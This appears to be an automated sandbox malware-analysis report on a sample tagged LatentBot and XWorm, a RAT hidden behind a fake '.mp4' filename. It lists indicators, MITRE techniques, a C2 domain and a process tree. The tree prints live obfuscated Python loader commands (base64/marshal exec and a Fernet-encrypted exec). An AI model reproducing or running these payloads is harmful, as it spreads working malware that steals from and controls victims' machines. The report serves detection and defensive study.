latentbot | d2b7d28afb9413b80512e0114f493459e1c4a1f9ebcb60516783a334246f14f5

Analysis

max time kernel
62s
max time network
65s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-10-2024 00:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe
Size

70.1MB
MD5

5300362727ae2ab1fd0277fb89eace8c
SHA1

29f59278b3ca5e07d1d928188bba4461615ef9e5
SHA256

4d388d2ab6b6fe9931a9cdfca6d5e78042db0a2795d20b7b26956bfb551c6659
SHA512

0c10d251805c15ad463c86fc7890b9e33aadfe84db69f475f917b43a2275b7c09be4e96e37457108e8e00925ff61905d7ee2489f2dc2716736a6dd06b910c6bb
SSDEEP

1572864:SPsDrTSCHDAOZ91GTml6uscxqquJJ1jBLvb8vSSeqUdBGHph2qndt9mC:SPESCc01GqfscxqhfjBLz8vSSxUd8dV

Score

10^/10

latentbot xworm defense_evasion discovery pyinstaller rat trojan

Malware Config

Extracted

Family

latentbot

vampstrench.zapto.org

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3840-6703-0x0000000006F80000-0x0000000006F92000-memory.dmp	family_xworm

LatentBot
Modular trojan written in Delphi which has been in-the-wild since 2013.
trojan latentbot
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe

Drops startup file 1 IoCs

Processes:

python.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk	python.exe

Executes dropped EXE 6 IoCs

Processes:

explorer.exepython.exepython.exepython.exepython.exepython.exe

pid	Process
820	explorer.exe
3032	python.exe
1772	python.exe
412	python.exe
3720	python.exe
3840	python.exe

Loads dropped DLL 64 IoCs

Processes:

explorer.exepython.exepython.exepython.exepython.exepython.exe

pid	Process
820	explorer.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
3032	python.exe
1772	python.exe
1772	python.exe
1772	python.exe
1772	python.exe
1772	python.exe
1772	python.exe
412	python.exe
412	python.exe
412	python.exe
412	python.exe
412	python.exe
412	python.exe
3720	python.exe
3720	python.exe
3720	python.exe
3720	python.exe
3720	python.exe
3720	python.exe
3720	python.exe
3720	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe
3840	python.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com
23	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
20	api.ipify.org
21	api.ipify.org
27	ip-api.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

Processes:

python.exepython.exe

pid	Process
1772	python.exe
412	python.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exe

pid	Process
3016	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Processes:

cmd.execmd.exe

pid	Process
3580	cmd.exe
2312	cmd.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral2/files/0x000b000000023b77-27.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exefind.exeattrib.exepython.execmd.exereg.execmd.exefind.exeattrib.exepython.exepython.exepython.exereg.exewmic.execmd.exetasklist.exepython.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 1 IoCs

Processes:

Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

vlc.exe

pid	Process
2780	vlc.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

python.exe

pid	Process
3840	python.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

vlc.exe

pid	Process
2780	vlc.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

AUDIODG.EXEvlc.exetasklist.exewmic.exepython.exe

description	pid	Process
Token: 33	4184	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4184	AUDIODG.EXE
Token: 33	2780	vlc.exe
Token: SeIncBasePriorityPrivilege	2780	vlc.exe
Token: SeDebugPrivilege	3016	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2720	wmic.exe
Token: SeSecurityPrivilege	2720	wmic.exe
Token: SeTakeOwnershipPrivilege	2720	wmic.exe
Token: SeLoadDriverPrivilege	2720	wmic.exe
Token: SeSystemProfilePrivilege	2720	wmic.exe
Token: SeSystemtimePrivilege	2720	wmic.exe
Token: SeProfSingleProcessPrivilege	2720	wmic.exe
Token: SeIncBasePriorityPrivilege	2720	wmic.exe
Token: SeCreatePagefilePrivilege	2720	wmic.exe
Token: SeBackupPrivilege	2720	wmic.exe
Token: SeRestorePrivilege	2720	wmic.exe
Token: SeShutdownPrivilege	2720	wmic.exe
Token: SeDebugPrivilege	2720	wmic.exe
Token: SeSystemEnvironmentPrivilege	2720	wmic.exe
Token: SeRemoteShutdownPrivilege	2720	wmic.exe
Token: SeUndockPrivilege	2720	wmic.exe
Token: SeManageVolumePrivilege	2720	wmic.exe
Token: 33	2720	wmic.exe
Token: 34	2720	wmic.exe
Token: 35	2720	wmic.exe
Token: 36	2720	wmic.exe
Token: SeIncreaseQuotaPrivilege	2720	wmic.exe
Token: SeSecurityPrivilege	2720	wmic.exe
Token: SeTakeOwnershipPrivilege	2720	wmic.exe
Token: SeLoadDriverPrivilege	2720	wmic.exe
Token: SeSystemProfilePrivilege	2720	wmic.exe
Token: SeSystemtimePrivilege	2720	wmic.exe
Token: SeProfSingleProcessPrivilege	2720	wmic.exe
Token: SeIncBasePriorityPrivilege	2720	wmic.exe
Token: SeCreatePagefilePrivilege	2720	wmic.exe
Token: SeBackupPrivilege	2720	wmic.exe
Token: SeRestorePrivilege	2720	wmic.exe
Token: SeShutdownPrivilege	2720	wmic.exe
Token: SeDebugPrivilege	2720	wmic.exe
Token: SeSystemEnvironmentPrivilege	2720	wmic.exe
Token: SeRemoteShutdownPrivilege	2720	wmic.exe
Token: SeUndockPrivilege	2720	wmic.exe
Token: SeManageVolumePrivilege	2720	wmic.exe
Token: 33	2720	wmic.exe
Token: 34	2720	wmic.exe
Token: 35	2720	wmic.exe
Token: 36	2720	wmic.exe
Token: SeDebugPrivilege	3840	python.exe

Suspicious use of FindShellTrayWindow 50 IoCs

Processes:

vlc.exe

pid	Process
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe

Suspicious use of SendNotifyMessage 15 IoCs

Processes:

vlc.exe

pid	Process
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

vlc.exepython.exe

pid	Process
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe
3840	python.exe
2780	vlc.exe
2780	vlc.exe
2780	vlc.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exeexplorer.exepython.execmd.execmd.execmd.exepython.execmd.exepython.execmd.exe

description	pid	Process	procid_target
PID 4264 wrote to memory of 2780	4264	Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe	87
PID 4264 wrote to memory of 2780	4264	Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe	87
PID 4264 wrote to memory of 820	4264	Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe	89
PID 4264 wrote to memory of 820	4264	Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe	89
PID 820 wrote to memory of 3032	820	explorer.exe	91
PID 820 wrote to memory of 3032	820	explorer.exe	91
PID 820 wrote to memory of 3032	820	explorer.exe	91
PID 3032 wrote to memory of 5104	3032	python.exe	92
PID 3032 wrote to memory of 5104	3032	python.exe	92
PID 3032 wrote to memory of 5104	3032	python.exe	92
PID 5104 wrote to memory of 4008	5104	cmd.exe	93
PID 5104 wrote to memory of 4008	5104	cmd.exe	93
PID 5104 wrote to memory of 4008	5104	cmd.exe	93
PID 3032 wrote to memory of 3664	3032	python.exe	94
PID 3032 wrote to memory of 3664	3032	python.exe	94
PID 3032 wrote to memory of 3664	3032	python.exe	94
PID 3664 wrote to memory of 1964	3664	cmd.exe	95
PID 3664 wrote to memory of 1964	3664	cmd.exe	95
PID 3664 wrote to memory of 1964	3664	cmd.exe	95
PID 3032 wrote to memory of 3560	3032	python.exe	96
PID 3032 wrote to memory of 3560	3032	python.exe	96
PID 3032 wrote to memory of 3560	3032	python.exe	96
PID 3560 wrote to memory of 3016	3560	cmd.exe	97
PID 3560 wrote to memory of 3016	3560	cmd.exe	97
PID 3560 wrote to memory of 3016	3560	cmd.exe	97
PID 3560 wrote to memory of 2204	3560	cmd.exe	98
PID 3560 wrote to memory of 2204	3560	cmd.exe	98
PID 3560 wrote to memory of 2204	3560	cmd.exe	98
PID 3560 wrote to memory of 5004	3560	cmd.exe	99
PID 3560 wrote to memory of 5004	3560	cmd.exe	99
PID 3560 wrote to memory of 5004	3560	cmd.exe	99
PID 3032 wrote to memory of 2720	3032	python.exe	101
PID 3032 wrote to memory of 2720	3032	python.exe	101
PID 3032 wrote to memory of 2720	3032	python.exe	101
PID 820 wrote to memory of 1772	820	explorer.exe	102
PID 820 wrote to memory of 1772	820	explorer.exe	102
PID 820 wrote to memory of 1772	820	explorer.exe	102
PID 1772 wrote to memory of 3580	1772	python.exe	103
PID 1772 wrote to memory of 3580	1772	python.exe	103
PID 1772 wrote to memory of 3580	1772	python.exe	103
PID 3580 wrote to memory of 3844	3580	cmd.exe	104
PID 3580 wrote to memory of 3844	3580	cmd.exe	104
PID 3580 wrote to memory of 3844	3580	cmd.exe	104
PID 820 wrote to memory of 412	820	explorer.exe	105
PID 820 wrote to memory of 412	820	explorer.exe	105
PID 820 wrote to memory of 412	820	explorer.exe	105
PID 412 wrote to memory of 2312	412	python.exe	106
PID 412 wrote to memory of 2312	412	python.exe	106
PID 412 wrote to memory of 2312	412	python.exe	106
PID 2312 wrote to memory of 2164	2312	cmd.exe	107
PID 2312 wrote to memory of 2164	2312	cmd.exe	107
PID 2312 wrote to memory of 2164	2312	cmd.exe	107
PID 820 wrote to memory of 3720	820	explorer.exe	108
PID 820 wrote to memory of 3720	820	explorer.exe	108
PID 820 wrote to memory of 3720	820	explorer.exe	108
PID 820 wrote to memory of 3840	820	explorer.exe	109
PID 820 wrote to memory of 3840	820	explorer.exe	109
PID 820 wrote to memory of 3840	820	explorer.exe	109

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
3844	attrib.exe
2164	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe
"C:\Users\Admin\AppData\Local\Temp\Lumaailabs_WebsiteBuilder-AI.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀��.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4264
- C:\Program Files\VideoLAN\VLC\vlc.exe
  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\completenminn.mp4"
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2780
- C:\explorerwi\explorer.exe
  "C:\explorerwi\explorer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:820
- - C:\explorerwin\python.exe
    "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAUAAAAAAAAA83AAAACXAAkAbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AQkAZAdkAWUAZAJkA2YEZASEBVoBbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AWUCWgNlBFoFZQRaBmUCWgdkBVoCZAZaBGQAWghkA1MAKQhU2gFf2gZyZXR1cm5OYwQAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAGQAUwApAU6pACkE2gJfX3IBAAAA2gNzdGXaAmFscwQAAAAgICAg2gZ1cm5hbWXaA19fX3IJAAAABwAAAHMGAAAAgACAAIAA8wAAAADpAQAAAOkCAAAAKQJUVCkJ2gNzdHJyCQAAANoFcHJpbnTaCmJhY2tfcHJpbnTaBGV4ZWPaCWJhY2tfZXhlY9oETVhFTNoFTVBHS0TaBXN0YWdlcgQAAAByCgAAAHIIAAAA+gg8bW9kdWxlPnIVAAAAAQAAAHODAAAA8AMBAQHgBAjgBQn48AMAAQyAdIB0+Pj44AgM+IgEiASIBIgE8AIDAQ3YBDvQBDuQM9AEO7Ak0AQ70AQ70AQ70AQ70AQ7+NgAC4B0gHT4+PjYCAz4iASIBIgEiATgDRKACtgMEIAJ2AcLgATYCA2ABdgICYAF2AcIgATYCAyABYAFgAVzJAAAAIIBCwCDAgcDhQULAIsCDQORCRsAmgEjAJsCHwOdBSMAowIlAw==')));MXEL(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAcAAAAAAAAA87QAAACXAGUAZABrAgAAAAByCgIAZQGmAAAAqwAAAAAAAAAAAAEAZAFkAmwCWgJkAWQCbANaA2QDZQRkBGUEZgRkBYQEWgVlBloHZQhaCQIAZQVkBmQHpgIAAKsCAAAAAAAAAABaCgIAZQsCAGUDagwAAAAAAAAAAAIAZQJqDQAAAAAAAAAAZQqmAQAAqwEAAAAAAAAAAKYBAACrAQAAAAAAAAAApgEAAKsBAAAAAAAAAAABAGQCUwApCEbpAAAAAE7aA2tledoLZGF0YV9iYXNlNjRjAgAAAAAAAAAAAAAABgAAAAMAAADz9AAAAIcFlwB0AQAAAAAAAAAAAABqAQAAAAAAAAAAfAGmAQAAqwEAAAAAAAAAAH0CfACgAgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAACKBXQHAAAAAAAAAAAAAIgFZgFkAYQIdAkAAAAAAAAAAAAAfAKmAQAAqwEAAAAAAAAAAEQApgAAAKsAAAAAAAAAAACmAQAAqwEAAAAAAAAAAH0DdAEAAAAAAAAAAAAAagUAAAAAAAAAAHwDpgEAAKsBAAAAAAAAAACgBgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAAB9BHwEUwApAk5jAQAAAAAAAAAAAAAACAAAABMAAADzTAAAAJUBlwBnAHwAXSBcAgAAfQF9AnwCiQN8AXQBAAAAAAAAAAAAAIkDpgEAAKsBAAAAAAAAAAB6BgAAGQAAAAAAAAAAAHoMAACRAowhUwCpACkB2gNsZW4pBNoCLjDaAWnaAWLaCWtleV9ieXRlc3MEAAAAICAggNoGdXJuYW1l+go8bGlzdGNvbXA+ehh4b3JfLjxsb2NhbHM+LjxsaXN0Y29tcD4IAAAAczIAAAD4gADQF1bQF1bQF1a5ZLhhwBGYAZhJoGGtI6hpqS6sLtEmONQcOdEYOdAXVtAXVtAXVvMAAAAAKQfaBmJhc2U2NNoJYjY0ZGVjb2Rl2gZlbmNvZGXaBWJ5dGVz2gllbnVtZXJhdGXaCWI2NGVuY29kZdoGZGVjb2RlKQZyAgAAAHIDAAAA2gRkYXRh2gp4b3JfcmVzdWx02g1yZXN1bHRfYmFzZTY0cgsAAABzBgAAACAgICAgQHIMAAAA2gR4b3JfchkAAAAFAAAAc2sAAAD4gADdCxHUCxuYS9ELKNQLKIBE2BATlwqSCpEMlAyASd0RFtAXVtAXVtAXVtAXVsVp0FBUwW/Eb9AXVtEXVtQXVtERV9QRV4BK3RQa1BQkoFrRFDDUFDDXFDfSFDfRFDnUFDmATdgLGNAEGHIOAAAAegkxMjcuMC4wLjFhHAQAAFVqSTNMakF1TUM0eE1USTNMall1TUM0eE1USTMzVlF1TUM2bU1WWTNTakZDTUhReE16SlNMMVFzbGk4eE1aazJMakF1TUM0eE1USnpMbTB4YWl3ek1WYzBMREJMTUVRMU1USTNMakF1TUM1Vk1wUTJMakNGTVM0eE1USTNMakF1bGk4eE1aazJMakF1TUM0eE1USTJMbFFzYWl0Vk5XZzBvaEJLTVgweEdEZmVMakF1TUdEWU1ESTNMbEdTTVM0eFVHVUdXVklkZWg1NGVYaGJUV2g0WEUwQ1kwaDBRMnBYVWh3QlZtc0VaQVZOZUh4SGF3RjlSbE5wV0J0OVhHaGJUVjBiWEVweWMwSlZkbkpZVTBCZ1ZtQmFlRWxNWFhnQmNseFRRVkY1U0VKNGQyQk9TbWQ3Qm0xWWNGVitiWEllVTBCYUIzRmViMWRuYzI5V2VIRjJTV3BwWmtSU1gxNUFTbmhqVjM1aWMwdHRkbllmYW5aL0FWRk9HMTUwYUg5ZWVGOWZIbFJtY2xSK1dBcEJUVjFvQTJKY1ZVSlRhVmdmYVVCblMyaHZaRnBNQWhzQmEyVUNIbnhEZmxoVFlnc0RkMTBYQUV4bWQwZDRlbHNiZjMwSVJWQmtGMGwwWjNSTGZRQmZRbWw1WWxSOUF3TmZUMmNhUmtwNWQwVmtIRWRiVkdaWkFYdGVSVVZLZDNnRlZYTllTWGx0Y1VsNGNuTlFaM2Q0QkhSbWZGMWxRMlpYVWtObkFYbHdaMTVoZFVrQVVtcDVHbEY1ZW54b1pnSk9UUUZvZDBwNVdrVmxlR29ZYVhockJXWmlYbWQ2WldkR1UyVkRXR1JFZWtocmRGa0NlbDUwVVg5bEFWeDhmUVZGYW5sL1NGZHZiQUJsZDN4ZGFBRjlHMU5tWWxSNllsbDhaM052VjJkeWNGVitiWEpIVTBObldWTkFRVmRuYzI5V2EycGZSR3AyY2g1NGRHUURkd0o0UjBwMlhVUlZSM0pHVTFkelhYMVFRVmRuYzI5V2VIRjJTWGxtY2taU0FuOEt4ekl1TUM0WU4rZ3hURkZkVlJnRjZ6ZEZUMTVKVmZRd1dPZ3pTMGhMVS9RNFV3UURTbFZOWDBwVTZ6ZEhYRmxBUkljeHdqSTNMakQwTmx0RFgxTmFTOG9tREVOZVZVZGJTdzVjUFM0eE1UTTNMakJkWEM0eE1jSTBMekV2NkM0OHNUKzNJN0FqNkNjL3VTZS9YN2sydkRiQk1URTJJOEF1TXk4OHNYUHZLaml1ZFA0NEtMb2gramszd0M0eEttc3czekF1T25RMnhUSTNKR29wd1M0eE5Ha3cyakF1TlhVMndUSTNLMnNwNkNJOHNYZnZKVHl1ZEs1MXdUVTBMejNlTUMwd1BFQThMakF1KQ7aBXN0YWdl2gRleGl0cg8AAADaB21hcnNoYWzaA3N0cnIZAAAA2gpiYWNrX3ByaW502gVwcmludNoJYmFja19leGVj2gRleGVj2g5kZWNyeXB0ZWRfZGF0YdoETVhFTNoFbG9hZHNyEAAAAHIGAAAAcg4AAAByDAAAAPoIPG1vZHVsZT5yJQAAAAEAAABzrQAAAPADAQEB2AMIiEWCPvAAAQEL2AQIgESBRoRGgEbgABbQABbQABbQABbQABbQABbQABbQABbwAgUBGYhj8AAFARmgA/AABQEZ8AAFARnwAAUBGfAABQEZ8A4ACROABdgHEIAE2BEVkBSQa/AAACRCEfEAABJDEfQAABJDEYAO2AAEgASAXYBXhF3QEyOQNtQTI6BO0RMz1BMz0QU01AU00QA11AA10AA10AA10AA1cg4AAAA=')))
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5104
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3664
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3560
    - - C:\Windows\SysWOW64\tasklist.exe
        
        TASKLIST /FI "STATUS eq RUNNING"
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
    - - C:\Windows\SysWOW64\find.exe
        
        find /V "Image Name"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2204
    - - C:\Windows\SysWOW64\find.exe
        
        find /V "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5004
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2720
- - C:\explorerwin\python.exe
    "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'uxyI_CawdzHc_-f0v31N6RdOhmPceWptkt9gJaHBwxU=').decrypt(b'gAAAAABmYRtbE3kDvZg300aepsUWvtGVCRp0y_uGbRqGwdV1rlvJgSyPO-cADNrX4D_nLAnBKx9sHQEeWCYlaPN6iFFWNUj-Wgs8h8a5ewhP6uv7LS4u0mQVfQsyuoFpfDwz-BfP6sxHi2gsB2pvT-RZvanf8HcC7KVJiTEyxaqOPycTWakVWSw91xNWMZWkfBbZL831y3yBxR3V51HSG3h1AyCW9osw4FsvH6bZvK1poaui_Z8lwp3c7wkZc7P6gnUKjXwo5jly-5GBet3847b4ZDtmTKJ9gP0MCh-rwtKPOL6hKK0_UE6iwhm4rq0DZogahI2CovjSaMY7GuQ5F17hE0Tc7UUxD84bjf0cdhQ5Dlmo41ETza572Ug7b1-ENxv5EDJeBnahwvQCnFqXIFB2pzvAQDzQ9jAEvY2KFm-cLdfvz7e5hSlcngS1acKMX5kUDC6rPSS1NFeRws9f165HswMC0xcbRL_hq60l19lMI4MSc4r4b7ugweDdnj376DQRKZeK3G35T3OpK06IN7Wm9M902osxL8z0BZaBf0ZoeMueTgHOAwWzqybauZZgMyBAY-0eFaj1PAmqZQMx9oanq6ygJeX3ogifwcxIo0wUTIWYPEEO8B7TjAsf6P_-YeEjr6GHNTyMwY3sgUuJvXfimaPKE02Ar0uA2kfYMTVMSSKmS__1SNrPq23VILw5tW0SfZQXtVwG0mhBx7yjb_6H6O8gY8fkpw8KGtbvt3vBiT7h5JCxQwFdB15FejxobU8YYH6MJJSq-kV1iJy_9TeVC3hLZE0Bu4zs-n83hXqoIqXHKHaxxTk-0cmxA6QgwDC8XXUQVeLEaIH0Y9K7Wq50lYntqZCObq_PuYW5a70qXo2wuzwYqzO8ZGRkHhp0nbu6U4HGyVmfbXgS9BTEJssrk0K-9GwtcdQMPkrxz3BJ6lyHsK5aT1534trR3gPzSQHNOjn_ie9TpDQ